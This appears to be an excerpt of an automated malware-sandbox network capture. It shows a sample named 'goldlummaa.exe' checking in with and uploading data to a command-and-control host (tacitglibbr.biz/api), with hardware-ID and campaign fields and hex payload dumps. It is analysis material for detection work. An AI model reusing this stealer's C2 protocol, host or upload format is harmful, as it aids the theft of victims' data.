                                                                                                                Dec 18, 2024 14:18:15.030169010 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii:
                                                                                                                Dec 18, 2024 14:18:15.030229092 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii:
                                                                                                                Dec 18, 2024 14:18:15.030241966 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii:
                                                                                                                Dec 18, 2024 14:18:15.030255079 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii:
                                                                                                                Dec 18, 2024 14:18:15.030455112 CET1236INData Raw: 3a ce 0e 3e 52 6b 0c 7b db 9a 71 f3 e8 50 d3 41 37 27 e9 51 74 85 dd 91 a7 a0 3b 70 1d 25 48 6b 73 52 a2 dd 19 43 89 11 23 1b 33 4b 08 89 7f 7e c4 a1 2f 41 80 d4 7a 75 da 83 70 77 ca d9 b6 6f c8 cc 1f 31 52 d7 03 29 76 b0 2e 8b e4 aa 70 ee 91 f3
                                                                                                                Data Ascii: :>Rk{qPA7'Qt;p%HksRC#3K~/Azupwo1R)v.pZHvc9qq8lW`Ux`}cnr6_$r3{l"d#Y=sUtXoD;e6c2I%w?%`Q8eb)h/kSD T'lE
                                                                                                                Dec 18, 2024 14:18:15.030467033 CET1236INData Raw: 46 cf 19 2b 2e cf 15 5f 37 fa ae 4b ed b2 1b c0 95 ba 1f 37 6a 85 3d 50 a4 57 32 3b ce 92 05 3e 94 ba c5 51 3a 72 de 3c 3f c5 83 b3 cf cf d9 31 94 6e 16 03 6a 96 e9 4d 78 2b fc f7 97 b2 fd 68 64 b3 a5 d7 d2 4e 0b b9 cf 52 2a 3e 54 a3 85 e3 5d 0a
                                                                                                                Data Ascii: F+._7K7j=PW2;>Q:r<?1njMx+hdNR*>T]Dh.6>()HiWA^rZ<Zl%wDRq)NjAenGqoV,E5F2N+>Nh%!}^9NtR]hKs}"{M~w^q~Z
                                                                                                                Dec 18, 2024 14:18:15.030479908 CET1236INData Raw: 8c ac 1e 38 60 8a 19 6c 8b 77 46 3e c3 f6 09 ca de c5 17 03 9e df 35 98 d3 68 c9 10 79 ea e3 9d 71 b7 cb 0e d8 4b 34 7a 45 69 63 6d b4 a4 c2 a8 85 d2 e5 21 ee 75 87 1f c4 c2 fb 1f 75 65 e6 d4 5d df ed 40 ca 69 d2 26 df 1c a2 3e 56 3f 3f ef 18 f8
                                                                                                                Data Ascii: 8`lwF>5hyqK4zEicm!uue]@i&>V??ajK.|dsN1efP73i!7yEe>VtJ\W9+Gb0r,OyV7Ek`RK{lQi8>W6]un"EZup_o`
                                                                                                                Dec 18, 2024 14:18:15.150155067 CET1236INData Raw: d7 97 6e 84 bd a6 78 57 b8 2a 73 7a f1 c6 37 5e e8 df 0b fe e9 a6 d9 63 e5 bc 6d 18 ef d7 6c 4f e8 d6 d3 25 95 a3 a7 ac 68 eb 7d 09 89 15 1b c0 94 10 fe 3a 8f 74 2e 73 94 c4 07 2a 76 63 ea 25 e6 71 ec 3c 78 65 d7 80 15 af 0c ae 25 79 e9 fc 75 ea
                                                                                                                Data Ascii: nxW*sz7^cmlO%h}:t.s*vc%q<xe%yua[s67S`[h"N#A(1M&E'DH3; "U@""N#(=/t@{Ati)k0cM?[%VdnA(6 /%0$zwd^0Z@gb#&ZTH


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.949722104.21.50.1614437460C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-18 13:17:39 UTC262OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-18 13:17:39 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-12-18 13:17:40 UTC1030INHTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:17:40 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=srm3g5641pj846c0emmhloj9mf; expires=Sun, 13-Apr-2025 07:04:19 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0bcKw1ltN3C2ppOM960FBIf3kQqO28oEUB4SwNZvFBQIDUI%2BwoezcrpKN3igTqauJD2YBNsFwvNTQEf07BbqrQbJKToeWiwO9e8mttbdG3aB2JpATNsL3tWxy5VE6PXrRM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6f3419e94325-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1555&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1779402&cwnd=180&unsent_bytes=0&cid=6b875cb5af8c427b&ts=819&x=0"
                                                                                                                2024-12-18 13:17:40 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                Data Ascii: 2ok
                                                                                                                2024-12-18 13:17:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.949728104.21.50.1614437460C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-18 13:17:41 UTC263OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 53
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-18 13:17:41 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                2024-12-18 13:17:43 UTC1038INHTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:17:43 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=62dp9hs2244epr3l8m4irro2je; expires=Sun, 13-Apr-2025 07:04:21 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iz9YCV9B8kvFYORaYCXcxQSSE35RQIPhlPnLMMMJJdEwdHzbnUFEKzM8cKot%2FqfBX%2BTQaGBKtMpgmaQoWi%2BUJSeD7T5izmg8KODP6By9521zJBUESSB1fHnpfoiPrUA5isg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6f41cab8727b-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=46842&min_rtt=1839&rtt_var=27410&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=952&delivery_rate=1587819&cwnd=232&unsent_bytes=0&cid=4cdef405fb7f092e&ts=1531&x=0"
                                                                                                                2024-12-18 13:17:43 UTC331INData Raw: 63 62 61 0d 0a 37 61 6c 6f 63 39 72 46 66 67 54 54 78 52 32 64 33 6a 77 36 52 75 56 52 62 79 2b 58 4c 73 73 4b 4e 4f 75 39 30 59 36 34 52 57 36 57 69 78 35 52 34 50 46 53 4a 71 43 67 50 36 65 71 54 6b 38 6a 79 58 4d 4f 53 37 55 55 72 57 74 59 6d 4e 6a 39 72 4d 34 6f 54 4e 66 50 43 52 2b 70 6f 46 49 6d 74 72 30 2f 70 34 56 48 47 43 4f 4c 63 31 55 4e 38 6b 53 70 61 31 69 4a 33 4c 72 68 79 43 6b 4e 68 63 55 50 47 37 2b 6d 47 6d 57 2f 71 48 6a 34 75 31 31 51 4b 49 77 38 42 30 4b 31 41 75 6c 76 54 73 6d 48 38 38 50 64 4d 51 2b 67 79 42 73 59 2b 4c 68 53 66 2f 47 67 63 37 2f 6b 48 6c 73 6a 68 7a 30 4a 53 2f 78 47 6f 32 4a 51 69 4e 6d 37 2f 74 45 6a 42 6f 58 4c 44 42 71 31 72 77 35 6f 74 61 39 7a 2f 72 46 64 47 47 72 48 4e 42 55 4e 72 51 7a 36 57 6c 57 59 7a 71
                                                                                                                Data Ascii: cba7aloc9rFfgTTxR2d3jw6RuVRby+XLssKNOu90Y64RW6Wix5R4PFSJqCgP6eqTk8jyXMOS7UUrWtYmNj9rM4oTNfPCR+poFImtr0/p4VHGCOLc1UN8kSpa1iJ3LrhyCkNhcUPG7+mGmW/qHj4u11QKIw8B0K1AulvTsmH88PdMQ+gyBsY+LhSf/Ggc7/kHlsjhz0JS/xGo2JQiNm7/tEjBoXLDBq1rw5ota9z/rFdGGrHNBUNrQz6WlWYzq
                                                                                                                2024-12-18 13:17:43 UTC1369INData Raw: 5a 59 70 48 6b 57 6c 70 47 71 72 4e 30 72 54 4e 65 4c 44 42 2b 35 71 68 78 30 75 61 78 30 2b 71 35 56 55 53 6d 4b 4d 77 42 48 2b 6b 2b 70 62 31 79 44 30 4c 6e 6f 31 79 6f 4b 6a 38 74 4b 58 2f 69 67 42 43 62 70 35 31 7a 36 72 46 6c 55 4d 73 55 4a 54 56 4b 37 56 65 6c 76 57 73 6d 48 38 2b 54 66 4a 41 2b 45 78 41 6b 5a 73 37 55 63 64 4c 65 71 65 75 32 36 57 31 59 75 68 43 45 48 51 2f 4e 50 6f 47 4e 66 6a 4e 69 33 72 4a 52 6e 43 35 65 4c 55 6c 47 5a 71 68 64 71 75 37 42 2f 76 36 4d 51 51 57 53 41 50 30 30 56 74 55 69 6f 62 46 65 4e 30 62 33 6f 31 69 45 43 67 73 51 4d 47 37 69 67 46 6d 36 35 70 6e 4c 30 73 31 35 64 4b 59 4d 31 41 55 7a 77 44 4f 63 6f 55 5a 47 66 36 36 7a 30 49 41 2b 64 69 54 38 53 74 71 6b 62 63 50 47 34 4d 65 62 38 57 56 52 6b 33 33 4d 44 53
                                                                                                                Data Ascii: ZYpHkWlpGqrN0rTNeLDB+5qhx0uax0+q5VUSmKMwBH+k+pb1yD0Lno1yoKj8tKX/igBCbp51z6rFlUMsUJTVK7VelvWsmH8+TfJA+ExAkZs7UcdLeqeu26W1YuhCEHQ/NPoGNfjNi3rJRnC5eLUlGZqhdqu7B/v6MQQWSAP00VtUiobFeN0b3o1iECgsQMG7igFm65pnL0s15dKYM1AUzwDOcoUZGf66z0IA+diT8StqkbcPG4Meb8WVRk33MDS
                                                                                                                2024-12-18 13:17:43 UTC1369INData Raw: 6d 46 6f 37 48 38 37 53 61 46 68 75 45 69 54 38 53 74 71 6b 62 63 50 47 34 4d 65 62 38 57 56 52 6b 33 33 4d 41 52 66 42 4a 70 6d 6c 63 68 39 71 35 34 4e 49 70 44 35 33 45 44 68 47 30 72 78 5a 72 76 36 4e 33 39 72 64 56 58 69 53 47 4f 55 30 44 74 55 75 78 4b 41 37 4a 36 37 54 67 31 79 68 4f 75 73 67 45 48 37 2b 78 58 48 6e 2f 76 6a 2f 34 73 42 34 41 5a 49 73 36 44 55 62 2f 53 4b 6c 76 57 34 7a 63 74 4f 2f 58 49 41 61 42 7a 41 34 64 73 61 6f 61 5a 72 61 6a 65 75 32 35 56 31 51 6f 78 33 31 4e 53 75 30 4d 38 53 68 35 6a 73 6d 77 77 39 6b 32 42 63 2f 55 52 41 6a 34 6f 42 41 6d 36 65 64 34 2b 72 52 56 58 69 79 48 49 51 68 44 2f 6b 32 6a 62 6c 65 45 30 37 58 73 32 79 63 4b 67 38 73 4e 46 71 71 31 47 57 43 6a 72 54 2b 78 2f 46 6c 41 5a 4e 39 7a 4f 31 33 69 58 62
                                                                                                                Data Ascii: mFo7H87SaFhuEiT8StqkbcPG4Meb8WVRk33MARfBJpmlch9q54NIpD53EDhG0rxZrv6N39rdVXiSGOU0DtUuxKA7J67Tg1yhOusgEH7+xXHn/vj/4sB4AZIs6DUb/SKlvW4zctO/XIAaBzA4dsaoaZrajeu25V1Qox31NSu0M8Sh5jsmww9k2Bc/URAj4oBAm6ed4+rRVXiyHIQhD/k2jbleE07Xs2ycKg8sNFqq1GWCjrT+x/FlAZN9zO13iXb
                                                                                                                2024-12-18 13:17:43 UTC196INData Raw: 30 4c 76 6b 31 53 67 49 67 63 30 4d 48 4c 32 6f 46 6e 53 35 71 58 4c 30 73 31 56 4b 4a 49 6f 33 41 55 6e 39 52 36 4d 6f 47 4d 6e 59 71 36 79 43 5a 7a 6d 43 78 41 6f 53 72 75 63 44 4b 4b 6a 6e 65 50 50 38 42 68 67 6f 69 54 4d 43 51 66 6c 48 6f 57 6c 61 68 39 69 32 35 64 49 76 48 6f 37 50 41 68 43 32 71 42 31 69 74 4b 4a 37 2b 4c 68 59 56 32 54 4a 63 77 70 56 74 52 54 70 52 33 47 38 6e 5a 4c 57 6d 6a 68 43 6c 6f 73 4e 48 66 6a 2f 58 47 71 79 71 33 66 77 75 6c 64 55 4c 6f 34 34 41 55 62 78 51 4b 42 74 55 49 6a 61 74 75 33 65 4b 77 61 4a 79 41 6b 65 74 36 67 55 4a 76 2f 6e 65 4f 0d 0a
                                                                                                                Data Ascii: 0Lvk1SgIgc0MHL2oFnS5qXL0s1VKJIo3AUn9R6MoGMnYq6yCZzmCxAoSrucDKKjnePP8BhgoiTMCQflHoWlah9i25dIvHo7PAhC2qB1itKJ7+LhYV2TJcwpVtRTpR3G8nZLWmjhClosNHfj/XGqyq3fwuldULo44AUbxQKBtUIjatu3eKwaJyAket6gUJv/neO
                                                                                                                2024-12-18 13:17:43 UTC1369INData Raw: 33 63 36 32 0d 0a 66 38 42 68 67 42 6b 44 67 44 53 37 56 54 35 33 45 57 6a 74 50 7a 74 4a 6f 72 42 59 6e 4e 44 78 32 35 6f 52 52 6a 75 61 4e 2b 2b 62 70 64 56 79 43 43 4d 67 4a 4a 2b 55 4b 6a 61 56 65 46 31 4c 7a 6e 33 32 64 43 7a 38 77 53 55 65 44 6e 4c 57 57 6e 73 47 2f 7a 2f 45 45 57 50 63 63 30 41 51 32 74 44 4b 68 36 58 49 50 52 74 75 50 66 4a 41 4f 49 78 67 77 64 73 71 34 55 59 4c 36 75 62 66 79 77 55 46 38 71 69 7a 30 41 52 2f 5a 42 36 53 59 57 6a 73 66 7a 74 4a 6f 4c 43 34 4c 6c 41 52 32 2f 35 77 4d 6f 71 4f 64 34 38 2f 77 47 47 43 69 4e 50 77 52 4e 2f 45 6d 68 59 31 2b 4d 33 72 6a 70 32 53 45 42 67 4d 49 59 47 37 75 70 48 32 71 39 6f 58 37 38 72 6c 5a 52 5a 4d 6c 7a 43 6c 57 31 46 4f 6c 4a 57 49 54 4c 74 50 79 61 4f 45 4b 57 69 77 30 64 2b 50 39
                                                                                                                Data Ascii: 3c62f8BhgBkDgDS7VT53EWjtPztJorBYnNDx25oRRjuaN++bpdVyCCMgJJ+UKjaVeF1Lzn32dCz8wSUeDnLWWnsG/z/EEWPcc0AQ2tDKh6XIPRtuPfJAOIxgwdsq4UYL6ubfywUF8qiz0AR/ZB6SYWjsfztJoLC4LlAR2/5wMoqOd48/wGGCiNPwRN/EmhY1+M3rjp2SEBgMIYG7upH2q9oX78rlZRZMlzClW1FOlJWITLtPyaOEKWiw0d+P9
                                                                                                                2024-12-18 13:17:43 UTC1369INData Raw: 54 2f 34 70 42 34 41 5a 4b 34 30 48 30 50 6c 44 4c 59 6d 54 38 6e 59 76 36 79 43 5a 77 69 46 78 41 34 57 74 4b 45 5a 59 4c 79 6d 63 50 36 38 55 56 77 76 6a 6a 55 4d 51 50 42 42 72 58 70 63 67 74 43 2f 35 64 59 71 54 4d 47 4c 44 51 6e 34 2f 31 78 58 76 4b 6c 78 2b 4b 6f 65 52 32 71 65 63 77 70 42 74 52 54 70 61 56 71 47 33 4c 7a 76 32 53 59 47 6e 64 6b 47 47 4c 43 69 45 47 32 2f 6f 57 33 35 73 31 64 62 4a 34 34 30 42 55 48 2f 54 36 34 6f 47 4d 6e 59 71 36 79 43 5a 79 2b 59 32 77 64 52 70 2b 6b 46 4a 72 61 72 50 36 66 38 56 6c 55 73 6a 54 63 4b 51 50 4a 4b 6f 48 70 66 6a 4e 47 7a 36 4e 45 6f 43 6f 76 49 43 67 4f 2b 6f 78 52 6c 76 4b 70 78 2f 4c 67 65 46 6d 53 41 4b 30 30 56 74 58 36 6b 5a 6b 32 47 32 4b 4c 6d 6d 6a 68 43 6c 6f 73 4e 48 66 6a 2f 58 47 4b 2f
                                                                                                                Data Ascii: T/4pB4AZK40H0PlDLYmT8nYv6yCZwiFxA4WtKEZYLymcP68UVwvjjUMQPBBrXpcgtC/5dYqTMGLDQn4/1xXvKlx+KoeR2qecwpBtRTpaVqG3Lzv2SYGndkGGLCiEG2/oW35s1dbJ440BUH/T64oGMnYq6yCZy+Y2wdRp+kFJrarP6f8VlUsjTcKQPJKoHpfjNGz6NEoCovICgO+oxRlvKpx/LgeFmSAK00VtX6kZk2G2KLmmjhClosNHfj/XGK/
                                                                                                                2024-12-18 13:17:43 UTC1369INData Raw: 39 52 58 43 4b 44 50 41 31 47 2f 45 32 76 62 56 79 43 32 62 37 76 33 43 46 4d 77 59 73 4e 43 66 6a 2f 58 45 61 71 71 6e 50 34 2f 45 45 57 50 63 63 30 41 51 32 74 44 4b 4a 6b 55 6f 37 66 76 75 2f 53 49 67 69 46 7a 67 6f 5a 71 71 38 63 59 61 4f 31 66 2f 61 35 55 6c 73 6b 67 7a 55 45 53 2f 5a 49 36 53 59 57 6a 73 66 7a 74 4a 6f 4b 41 49 6a 69 44 51 72 34 75 46 4a 2f 38 61 42 7a 76 2b 51 65 57 53 2b 4e 50 41 42 4f 38 30 2b 69 62 56 79 49 32 4c 76 68 79 43 51 44 67 4d 38 4b 48 72 36 68 48 57 6d 33 6f 48 62 2b 74 46 6b 59 61 73 63 30 46 51 32 74 44 49 64 76 56 59 32 66 72 4b 4c 44 5a 77 75 44 69 31 4a 52 75 4b 30 57 62 4c 2b 6e 65 4f 32 36 56 31 67 6e 6c 54 41 4c 52 66 4e 41 70 57 56 65 67 4e 2b 32 35 39 63 73 41 59 6e 4c 41 52 44 34 36 56 78 68 71 65 63 6e 76
                                                                                                                Data Ascii: 9RXCKDPA1G/E2vbVyC2b7v3CFMwYsNCfj/XEaqqnP4/EEWPcc0AQ2tDKJkUo7fvu/SIgiFzgoZqq8cYaO1f/a5UlskgzUES/ZI6SYWjsfztJoKAIjiDQr4uFJ/8aBzv+QeWS+NPABO80+ibVyI2LvhyCQDgM8KHr6hHWm3oHb+tFkYasc0FQ2tDIdvVY2frKLDZwuDi1JRuK0WbL+neO26V1gnlTALRfNApWVegN+259csAYnLARD46Vxhqecnv
                                                                                                                2024-12-18 13:17:43 UTC1369INData Raw: 30 31 57 68 59 48 71 49 63 2b 33 63 59 6b 4a 2b 6c 72 49 4a 31 51 73 2f 5a 53 6b 6e 34 34 42 39 30 6f 36 46 38 36 62 38 5a 5a 68 71 67 4b 51 42 4c 34 6c 32 58 56 6c 47 54 30 72 58 37 79 32 73 5a 6a 4d 55 45 46 71 37 6e 55 69 61 2b 35 79 66 47 2f 42 59 59 47 38 6c 7a 46 51 32 74 44 4a 78 72 57 49 66 59 70 66 32 58 41 42 61 43 7a 52 30 41 2b 4f 6c 63 59 50 48 2f 4c 37 48 38 57 6b 6c 6b 33 32 4e 66 46 71 41 66 2f 6a 67 45 6c 70 47 71 72 4d 78 6e 56 4e 32 46 53 67 50 34 2f 31 77 68 73 72 56 74 2b 62 39 49 57 32 4f 35 44 53 4e 4b 38 30 6d 75 65 42 53 6e 31 4b 66 72 6d 6d 6c 4d 67 49 74 53 4b 50 6a 76 58 46 6e 2f 35 32 65 2f 35 42 35 74 4a 34 6b 39 43 6c 76 6b 41 59 64 76 55 49 7a 59 6f 36 37 30 4c 42 69 49 69 30 52 52 76 75 64 45 4e 76 2f 6e 65 2b 37 38 42 67
                                                                                                                Data Ascii: 01WhYHqIc+3cYkJ+lrIJ1Qs/ZSkn44B90o6F86b8ZZhqgKQBL4l2XVlGT0rX7y2sZjMUEFq7nUia+5yfG/BYYG8lzFQ2tDJxrWIfYpf2XABaCzR0A+OlcYPH/L7H8Wklk32NfFqAf/jgElpGqrMxnVN2FSgP4/1whsrVt+b9IW2O5DSNK80mueBSn1KfrmmlMgItSKPjvXFn/52e/5B5tJ4k9ClvkAYdvUIzYo670LBiIi0RRvudENv/ne+78Bg
                                                                                                                2024-12-18 13:17:43 UTC1369INData Raw: 4d 32 72 37 53 36 68 2b 52 70 37 51 2f 4d 4c 73 42 6a 4b 78 33 67 6b 66 74 71 41 4b 64 2f 48 70 50 2f 44 38 42 6d 46 6b 7a 33 4d 79 41 37 56 55 36 54 41 57 76 4e 79 39 34 74 30 78 48 63 4c 73 42 42 61 35 73 51 78 78 76 75 68 52 79 5a 30 65 46 6d 53 42 63 31 55 66 75 77 79 74 65 52 62 52 6a 2b 47 33 6a 33 52 62 33 35 6b 56 58 36 48 6e 43 69 62 70 39 54 47 2f 72 68 34 41 5a 4d 41 77 48 31 2f 7a 54 37 39 72 45 62 66 68 6c 4f 4c 64 4a 68 71 66 78 67 59 77 75 37 59 57 57 49 2b 79 66 50 47 79 57 55 34 31 78 33 31 4e 51 72 55 55 6b 43 67 65 79 65 44 39 72 4d 4a 6e 56 4d 2f 2b 43 52 2b 32 6f 41 70 33 2f 49 42 78 2b 4c 31 49 53 43 6d 4c 45 67 35 63 2f 77 7a 6e 4b 46 44 4a 68 2b 47 69 6d 69 4d 64 7a 35 4e 61 51 2b 50 79 54 7a 48 68 39 57 43 78 70 52 35 4f 5a 4e 39
                                                                                                                Data Ascii: M2r7S6h+Rp7Q/MLsBjKx3gkftqAKd/HpP/D8BmFkz3MyA7VU6TAWvNy94t0xHcLsBBa5sQxxvuhRyZ0eFmSBc1UfuwyteRbRj+G3j3Rb35kVX6HnCibp9TG/rh4AZMAwH1/zT79rEbfhlOLdJhqfxgYwu7YWWI+yfPGyWU41x31NQrUUkCgeyeD9rMJnVM/+CR+2oAp3/IBx+L1ISCmLEg5c/wznKFDJh+GimiMdz5NaQ+PyTzHh9WCxpR5OZN9


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.949734104.21.50.1614437460C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-18 13:17:44 UTC282OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=7MOPAZNNL5BSB8TEC5C
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 12857
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-18 13:17:44 UTC12857OUTData Raw: 2d 2d 37 4d 4f 50 41 5a 4e 4e 4c 35 42 53 42 38 54 45 43 35 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 37 44 42 36 46 32 32 31 34 33 41 46 44 32 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 37 4d 4f 50 41 5a 4e 4e 4c 35 42 53 42 38 54 45 43 35 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 4d 4f 50 41 5a 4e 4e 4c 35 42 53 42 38 54 45 43 35 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                Data Ascii: --7MOPAZNNL5BSB8TEC5CContent-Disposition: form-data; name="hwid"277DB6F22143AFD2F9F1B7136A1E0C5E--7MOPAZNNL5BSB8TEC5CContent-Disposition: form-data; name="pid"2--7MOPAZNNL5BSB8TEC5CContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                2024-12-18 13:17:47 UTC1038INHTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:17:47 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=c0iaa2ios7b74725kq8of8qfqf; expires=Sun, 13-Apr-2025 07:04:25 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4R0Wzk4KakfqlGBEb9jVgPcvKpwJlDC0M1oGjieHvJovpMxkTnc6T68fMskU%2BZVQzeElADfm%2BnQWw9WJX55woxkQnMElclxkRhsLM3GrkSI1rhlIYIgDHeVxGNtZfL2Jdl8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6f55aa1b8c90-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8602&min_rtt=2046&rtt_var=4854&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13797&delivery_rate=1427174&cwnd=201&unsent_bytes=0&cid=61dabf5d630a617b&ts=2474&x=0"
                                                                                                                2024-12-18 13:17:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-18 13:17:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.949745104.21.50.1614437460C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-18 13:17:49 UTC271OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=ORQDK9H7
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 15009
                                                                                                                Host: tacitglibbr.biz
